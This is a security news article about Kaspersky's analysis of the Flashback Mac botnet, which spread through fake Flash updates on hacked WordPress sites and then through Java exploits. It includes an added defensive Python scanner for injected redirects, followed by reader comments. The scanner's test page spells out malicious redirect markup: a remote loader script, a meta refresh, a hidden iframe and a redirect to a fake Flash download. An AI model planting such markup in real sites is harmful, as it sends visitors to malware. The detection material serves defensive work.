Analysis: Flashback Spread Via Social Engineering, Then Java Exploits

Kaspersky Lab‘s latest analysis of the Mac OS X Flashback botnet reveals that the botnet’s malware was spread via drive-by downloads on hacked WordPress web sites.

From September 2011 until February 2012, the Flashback creators distributed the trojan through compromised WordPress sites that prompted users to download various iterations of a fake Adobe Flash Player update that was, in actuality, the Mac trojan.

The attacks started with social engineering lures; it wasn’t until February that the Flashback authors began using exploits to grow the botnet. They exploited known Java vulnerabilities, at least two of which date back as far as June 2009. More importantly, though, Flashback’s creators took advantage of the window of exposure between Oracle’s and Apple’s patch schedules.

According to Kaspersky’s Alex Gostev, Apple creates its own patches to fix Java vulnerabilities instead of using Oracle’s. So, the bugs had already been patched by Oracle, but Apple had not yet deployed its own patches. Gostev notes that on average, historically speaking, there is a two month delay between Oracle’s fixes, which come first, and Apple’s.

In March 2012, Flashback’s authors started making use of a Russian partner program that somehow injected redirect scripts into legitimate websites. Gostev writes that tens of thousands of WordPress sites were infected in late February and early March, and notes that other estimates put the number as high as 100,000 infected sites. It’s unclear how the sites became infected, but Gostev believes bloggers were either using vulnerable versions of WordPress or had installed the ToolsPack plugin.
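The injected redirect scripts described above are the part of the chain a site owner can actually look for. The following is an added example, not code from Kaspersky, Threatpost or the Flashback analysis: a small scanner that walks a page’s HTML and flags the usual injection shapes (an external `<script src>`, a hidden `<iframe>`, a meta refresh, or inline JavaScript that assigns `location`) whenever they point outside an allow-list of first-party hosts. The allow-list hosts, the `bad.invalid` domain and both sample pages are constructed for the example.

```python
"""Scan rendered WordPress pages for injected redirect scripts.

Added example (not from the article or Kaspersky). ALLOWED_HOSTS is an
assumption a site owner fills in with their own first-party hosts; the
two sample pages below are constructed test input.
"""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Hosts the site legitimately loads scripts and frames from (assumed).
ALLOWED_HOSTS = {"example-blog.test", "cdn.example-blog.test"}

# Inline JavaScript that forces navigation to another URL.
REDIRECT_JS = re.compile(
    r"(?:window|document|top|self)\.location(?:\.href)?\s*=(?!=)\s*[\"']([^\"']+)[\"']",
    re.I,
)
# The "url=" part of a <meta http-equiv="refresh" content="0; url=..."> tag.
META_REFRESH = re.compile(r"url\s*=\s*([^;\s]+)", re.I)


def is_external(url: str) -> bool:
    """True when the URL names a host that is not on the allow-list."""
    host = urlparse(url).hostname
    return host is not None and host.lower() not in ALLOWED_HOSTS


class RedirectFinder(HTMLParser):
    """Collects (kind, url) findings for each suspicious redirect element."""

    def __init__(self):
        super().__init__()
        self.findings = []
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "script":
            self._in_script = True
            src = a.get("src")
            if src and is_external(src):
                self.findings.append(("external-script", src))
        elif tag == "iframe":
            src = a.get("src") or ""
            style = (a.get("style") or "").replace(" ", "").lower()
            hidden = (a.get("width") == "0" or a.get("height") == "0"
                      or "display:none" in style or "visibility:hidden" in style)
            if src and hidden and is_external(src):
                self.findings.append(("hidden-iframe", src))
        elif tag == "meta" and (a.get("http-equiv") or "").lower() == "refresh":
            m = META_REFRESH.search(a.get("content") or "")
            if m:
                url = m.group(1).strip("\"'")
                if is_external(url):
                    self.findings.append(("meta-refresh", url))

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        # HTMLParser hands us the raw body of a <script> block here.
        if self._in_script:
            for url in REDIRECT_JS.findall(data):
                if is_external(url):
                    self.findings.append(("js-redirect", url))


def scan_page(html: str):
    """Return a list of (kind, url) findings for one page of HTML."""
    finder = RedirectFinder()
    finder.feed(html)
    finder.close()
    return finder.findings


# Constructed sample pages: one clean, one carrying four injected redirects.
CLEAN_PAGE = """<html><head>
<script src="https://cdn.example-blog.test/jquery.js"></script>
</head><body><p>Post body</p>
<a href="https://example-blog.test/about">About</a>
</body></html>"""

INJECTED_PAGE = """<html><head>
<script src="https://cdn.example-blog.test/jquery.js"></script>
<script src="http://bad.invalid/loader.js"></script>
<meta http-equiv="refresh" content="0; url=http://bad.invalid/go">
</head><body><p>Post body</p>
<iframe src="http://bad.invalid/frame" width="0" height="0"></iframe>
<script>window.location.href = "http://bad.invalid/FlashPlayer.dmg";</script>
</body></html>"""


if __name__ == "__main__":
    for name, page in (("clean", CLEAN_PAGE), ("injected", INJECTED_PAGE)):
        print(name, scan_page(page))
```

Run it over saved copies of your own pages (or the output of `curl` against them): a clean page yields no findings, while each injected element is reported with the URL it points to, which is what you would then trace back to the theme or plugin file that emitted it.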

Read a more detailed analysis at Securelist.

Discussion

  • Anonymous on

    16.5% of Mac users are on 10.5. All because Apple won't issue security updates for older OS X versions. Diginotar root certs, Java, Flash, all those vulnerable scripts exposed. Still think Macs are "safe" for computer newbies and grandma to do her online banking because she's too old to go to the bank in person? Flashflake isn't going anywhere, not until Apple pushes out a mandatory update for all OS X versions, which they won't do. Come this summer, when 10.8 rolls out, over 65% of Mac users, 10.5 + 10.6 combined, will be vulnerable because Apple only supports the last two operating systems in circulation. Of course Apple doesn't care; they are using this malware scare to justify closing their platform, making everyone buy software through their overpriced online store. Apple's formula is to win in China where IP laws are weak and Microsoft and open computers failed. BTW Windows 8 is fckugly and going to fail just like their phones.
  • Anonymous on

    Keeping your software up to date is a general rule for a common user if they're worried about safety.

  • Anonymous on

    Problem is 10.5 was shipped with Flash, Java and certs. Most computer users, especially of Apple products, are just users; they trust Software Update is taking care of them, but they are only getting their iTunes and Safari updates and not much else. OS X is a pretty secure OS, but only if nobody leaves the keys in the door.
